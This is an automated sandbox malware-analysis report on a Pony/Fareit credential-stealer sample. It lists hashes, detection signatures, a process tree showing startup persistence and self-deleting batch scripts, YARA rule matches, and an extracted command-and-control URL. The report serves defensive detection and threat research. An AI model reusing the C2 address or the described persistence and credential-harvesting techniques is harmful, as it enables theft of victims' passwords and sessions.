Play interactive tour

Edit tour

Windows Analysis Report 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Overview

General Information

Sample Name:	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
Analysis ID:	499220
MD5:	3087b67577a90aa611436c94ed23ae5a
SHA1:	6a84f2dd65787b2f9041421357c9939c63dd796d
SHA256:	2cec15c8fef9435abd5c332486d8ad7083eeb9eb84de9077b5bf6bb42458dba5
Tags:	exePony
Infos:
Most interesting Screenshot:

Detection

Fareit Pony

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

Yara detected Fareit stealer

Detected unpacking (changes PE section rights)

Yara detected Pony

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Contains functionality to execute programs as a different user

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Creates a start menu entry (Start Menu\Programs\Startup)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Sigma detected: PowerShell Script Run in AppData

Classification

Process Tree

System is w10x64

2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe (PID: 7012 cmdline: 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' MD5: 3087B67577A90AA611436C94ED23AE5A)

2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe (PID: 7060 cmdline: 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' MD5: 3087B67577A90AA611436C94ED23AE5A)

cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wscript.exe (PID: 3184 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

Adnexal8.exe (PID: 5600 cmdline: 'C:\Users\user\AppData\Roaming\Adnexal8.exe' MD5: CEA30515CD73B348562CA2ABE1E4D47C)

Adnexal8.exe (PID: 6892 cmdline: 'C:\Users\user\AppData\Roaming\Adnexal8.exe' MD5: CEA30515CD73B348562CA2ABE1E4D47C)

cmd.exe (PID: 4540 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Pony

{"C2 list": ["http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12ddb:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14f5b:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12610:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12cce:$s3: POST %s HTTP/1.0 0x12cf7:$s4: Accept-Encoding: identity, *;q=0
00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12ddb:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14f5b:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12610:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12cce:$s3: POST %s HTTP/1.0 0x12cf7:$s4: Accept-Encoding: identity, *;q=0
0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012	pony	Identify Pony	Brian Wallace @botnet_hunter	0xcad6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xd8c8:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x10a72:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xc06f:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xc0e2:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xc9e0:$s3: POST %s HTTP/1.0 0xd885:$s3: POST %s HTTP/1.0 0xca09:$s4: Accept-Encoding: identity, *;q=0
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060	pony	Identify Pony	Brian Wallace @botnet_hunter	0xf9ca:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x11854:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x595f5:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x5b449:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xf394:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x59266:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xf767:$s3: POST %s HTTP/1.0 0xf987:$s3: POST %s HTTP/1.0 0xf790:$s4: Accept-Encoding: identity, *;q=0
Process Memory Space: Adnexal8.exe PID: 5600	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Adnexal8.exe PID: 5600	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
Process Memory Space: Adnexal8.exe PID: 5600	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Adnexal8.exe PID: 5600	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: Adnexal8.exe PID: 5600	pony	Identify Pony	Brian Wallace @botnet_hunter	0x121a5:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12f97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16141:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1173e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x117b1:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x120af:$s3: POST %s HTTP/1.0 0x12f54:$s3: POST %s HTTP/1.0 0x120d8:$s4: Accept-Encoding: identity, *;q=0
Process Memory Space: Adnexal8.exe PID: 6892	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
Process Memory Space: Adnexal8.exe PID: 6892	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Adnexal8.exe PID: 6892	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: Adnexal8.exe PID: 6892	pony	Identify Pony	Brian Wallace @botnet_hunter	0x4e8d8:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x50740:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x55423:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x57299:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x4e297:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x5509f:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x4e675:$s3: POST %s HTTP/1.0 0x4e895:$s3: POST %s HTTP/1.0 0x4e69e:$s4: Accept-Encoding: identity, *;q=0
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
12.2.Adnexal8.exe.400000.0.raw.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
12.2.Adnexal8.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.Adnexal8.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.Adnexal8.exe.400000.0.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d99:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1244e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12b0c:$s3: POST %s HTTP/1.0 0x12b35:$s4: Accept-Encoding: identity, *;q=0
0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d99:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1244e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12b0c:$s3: POST %s HTTP/1.0 0x12b35:$s4: Accept-Encoding: identity, *;q=0
0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x11e19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x13199:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1164e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x11d0c:$s3: POST %s HTTP/1.0 0x11d35:$s4: Accept-Encoding: identity, *;q=0
10.2.Adnexal8.exe.4d141c2.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.Adnexal8.exe.4d141c2.1.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x11e19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x13199:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1164e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x11d0c:$s3: POST %s HTTP/1.0 0x11d35:$s4: Accept-Encoding: identity, *;q=0
12.1.Adnexal8.exe.400000.0.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
12.1.Adnexal8.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.1.Adnexal8.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d99:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1244e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12b0c:$s3: POST %s HTTP/1.0 0x12b35:$s4: Accept-Encoding: identity, *;q=0
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
12.1.Adnexal8.exe.400000.0.raw.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.1.Adnexal8.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d99:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1244e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12b0c:$s3: POST %s HTTP/1.0 0x12b35:$s4: Accept-Encoding: identity, *;q=0
12.1.Adnexal8.exe.400000.0.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1470c:$s3: POST %s HTTP/1.0 0x14735:$s4: Accept-Encoding: identity, *;q=0
10.2.Adnexal8.exe.4d141c2.1.raw.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
10.2.Adnexal8.exe.4d141c2.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.Adnexal8.exe.4d141c2.1.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d99:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1244e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12b0c:$s3: POST %s HTTP/1.0 0x12b35:$s4: Accept-Encoding: identity, *;q=0
12.2.Adnexal8.exe.400000.0.unpack	JoeSecurity_Fareit	Yara detected Fareit stealer	Joe Security
12.2.Adnexal8.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.Adnexal8.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.Adnexal8.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c19:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14d99:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1244e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12b0c:$s3: POST %s HTTP/1.0 0x12b35:$s4: Accept-Encoding: identity, *;q=0
Click to see the 33 entries

Sigma Overview

System Summary:

Sigma detected: PowerShell Script Run in AppData

Show sources

Source: Process started

Author: Florian Roth, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ', CommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\Adnexal8.exe' , ParentImage: C:\Users\user\AppData\Roaming\Adnexal8.exe, ParentProcessId: 6892, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ', ProcessId: 4540

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack

Malware Configuration Extractor: Pony {"C2 list": ["http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Virustotal: Detection: 73%	Perma Link
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Metadefender: Detection: 71%	Perma Link
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	ReversingLabs: Detection: 89%

Antivirus / Scanner detection for submitted sample

Show sources

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Avira: detected

Yara detected Pony

Show sources

Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Adnexal8.exe

Avira: detection malicious, Label: HEUR/AGEN.1112794

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Metadefender: Detection: 72%			Perma Link
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	ReversingLabs: Detection: 89%

Machine Learning detection for sample

Show sources

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Adnexal8.exe

Joe Sandbox ML: detected

Source: 10.2.Adnexal8.exe.4d141c2.1.unpack	Avira: Label: TR/Kryptik.avp.8
Source: 12.2.Adnexal8.exe.400000.0.unpack	Avira: Label: TR/Kryptik.avp.8
Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack	Avira: Label: TR/Kryptik.avp.8
Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	Avira: Label: TR/Kryptik.avp.8
Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	Avira: Label: TR/Kryptik.avp.8
Source: 12.1.Adnexal8.exe.400000.0.unpack	Avira: Label: TR/Kryptik.avp.8

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	1_2_0040D423
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040A364 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	1_2_0040A364
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040A1A9 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,	1_2_0040A1A9
